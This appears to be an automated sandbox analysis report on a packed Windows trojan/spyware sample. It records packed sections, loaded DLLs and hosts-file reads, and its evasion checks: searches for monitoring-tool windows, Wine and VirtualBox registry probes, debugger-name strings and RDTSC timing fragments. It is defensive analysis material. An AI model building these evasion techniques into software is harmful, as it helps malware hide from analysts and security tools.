Source: XJiB3BdLTg.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: XJiB3BdLTg.exeStatic PE information: Section: lggscavc ZLIB complexity 0.9945723040088293
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@10/2
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_001C255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_001C255D
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_001C29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_001C29FF
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: XJiB3BdLTg.exeVirustotal: Detection: 48%
Source: XJiB3BdLTg.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: XJiB3BdLTg.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeSection loaded: kernel.appcore.dllJump to behavior
Source: XJiB3BdLTg.exeStatic file information: File size 4471296 > 1048576
Source: XJiB3BdLTg.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x289000
Source: XJiB3BdLTg.exeStatic PE information: Raw size of lggscavc is bigger than: 0x100000 < 0x1b6e00

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeUnpacked PE file: 0.2.XJiB3BdLTg.exe.1c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lggscavc:EW;pdskyepf:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lggscavc:EW;pdskyepf:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: XJiB3BdLTg.exeStatic PE information: real checksum: 0x4475af should be: 0x4474b8
Source: XJiB3BdLTg.exeStatic PE information: section name:
Source: XJiB3BdLTg.exeStatic PE information: section name: .idata
Source: XJiB3BdLTg.exeStatic PE information: section name:
Source: XJiB3BdLTg.exeStatic PE information: section name: lggscavc
Source: XJiB3BdLTg.exeStatic PE information: section name: pdskyepf
Source: XJiB3BdLTg.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_005441D0 push eax; mov dword ptr [esp], edx0_2_005441D5
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_00242340 push eax; mov dword ptr [esp], 00000000h0_2_00242343
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_0027C7F0 push eax; mov dword ptr [esp], 00000000h0_2_0027C743
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_0021E92D push es; retf 0_2_0021E92E
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_00200AC0 push eax; mov dword ptr [esp], 00000000h0_2_00200AC4
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_00221430 push eax; mov dword ptr [esp], 00000000h0_2_00221433
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_002439A0 push eax; mov dword ptr [esp], 00000000h0_2_002439A3
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_0021DAD0 push eax; mov dword ptr [esp], edx0_2_0021DAD1
Source: XJiB3BdLTg.exeStatic PE information: section name: lggscavc entropy: 7.956092782324055

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: XJiB3BdLTg.exe, 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
Source: XJiB3BdLTg.exe, 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
Source: XJiB3BdLTg.exe, 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WINDBG.EXE
Source: XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: XJiB3BdLTg.exe, 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A79AC1 second address: A79AC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A79AC6 second address: A79ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5BD0C7BA66h 0x0000000a jg 00007F5BD0C7BA66h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A79ADA second address: A79AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A88111 second address: A88115 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A88115 second address: A8811B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A8811B second address: A88136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a pushad 0x0000000b jmp 00007F5BD0C7BA6Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A882B7 second address: A882BD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A882BD second address: A882E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F5BD0C7BA77h 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007F5BD0C7BA66h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A8842E second address: A8843A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F5BD0FFF0C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A889DF second address: A889E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A889E5 second address: A889E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A889E9 second address: A88A09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA6Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F5BD0C7BA81h 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007F5BD0C7BA66h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A8C462 second address: A8C468 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A8C468 second address: A8C46C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A8C46C second address: A8C48E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jnc 00007F5BD0FFF0C6h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A8C48E second address: A8C4B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5BD0C7BA6Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A8C4B6 second address: A8C4DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5BD0FFF0D7h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A8C4DC second address: A8C4E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A8C73C second address: A8C740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A8C8A3 second address: A8C8C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 add dword ptr [esp], 4099B3A0h 0x0000000d lea ebx, dword ptr [ebp+12BAF39Fh] 0x00000013 xor dword ptr [ebp+12A31AEBh], esi 0x00000019 xchg eax, ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d pushad 0x0000001e popad 0x0000001f pop eax 0x00000020 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A8CA31 second address: A8CA52 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5BD0FFF0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F5BD0FFF0D4h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A6DE90 second address: A6DE96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A6DE96 second address: A6DE9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A6DE9C second address: A6DEA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AAACC8 second address: AAACD4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5BD0FFF0C6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AAACD4 second address: AAACE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F5BD0C7BA70h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AAB0A7 second address: AAB0AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AAB1F8 second address: AAB1FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AAB1FC second address: AAB20A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F5BD0FFF0C6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AAB20A second address: AAB20E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AAB20E second address: AAB224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F5BD0FFF0CDh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AAB224 second address: AAB24B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5BD0C7BA71h 0x0000000f jmp 00007F5BD0C7BA6Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AAB24B second address: AAB263 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AAB263 second address: AAB274 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5BD0C7BA6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AAB6B4 second address: AAB6B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AAB953 second address: AAB98F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BD0C7BA6Fh 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F5BD0C7BA6Ah 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push esi 0x00000014 pop esi 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 popad 0x00000019 jnc 00007F5BD0C7BA66h 0x0000001f pop eax 0x00000020 push edi 0x00000021 pushad 0x00000022 popad 0x00000023 pop edi 0x00000024 pushad 0x00000025 jng 00007F5BD0C7BA66h 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AABAC5 second address: AABAC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AABAC9 second address: AABAE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BD0C7BA6Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnp 00007F5BD0C7BA66h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AABAE5 second address: AABAEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AA185B second address: AA1864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A7EAFF second address: A7EB0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A7EB0B second address: A7EB24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e push edi 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pop edi 0x00000014 popad 0x00000015 push edx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AAC91C second address: AAC949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5BD0FFF0C6h 0x0000000a popad 0x0000000b pop esi 0x0000000c pushad 0x0000000d jng 00007F5BD0FFF0D8h 0x00000013 jne 00007F5BD0FFF0CEh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AB1C02 second address: AB1C2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA70h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 jnp 00007F5BD0C7BA72h 0x00000017 jl 00007F5BD0C7BA6Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AB1E5A second address: AB1E5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AB1E5E second address: AB1E6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AB1E6B second address: AB1E70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AB1E70 second address: AB1EAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jnp 00007F5BD0C7BA78h 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 pushad 0x00000017 push esi 0x00000018 pop esi 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c push ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AB1EAF second address: AB1EC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b jl 00007F5BD0FFF0C8h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AB39C9 second address: AB39D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AB39D3 second address: AB39D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AB39D7 second address: AB39F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5BD0C7BA71h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A7D036 second address: A7D03A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A7D03A second address: A7D051 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5BD0C7BA66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f jp 00007F5BD0C7BA66h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A7D051 second address: A7D06F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007F5BD0FFF0CFh 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A7D06F second address: A7D074 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ABAA53 second address: ABAA5F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5BD0FFF0CEh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A7B5AB second address: A7B5B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
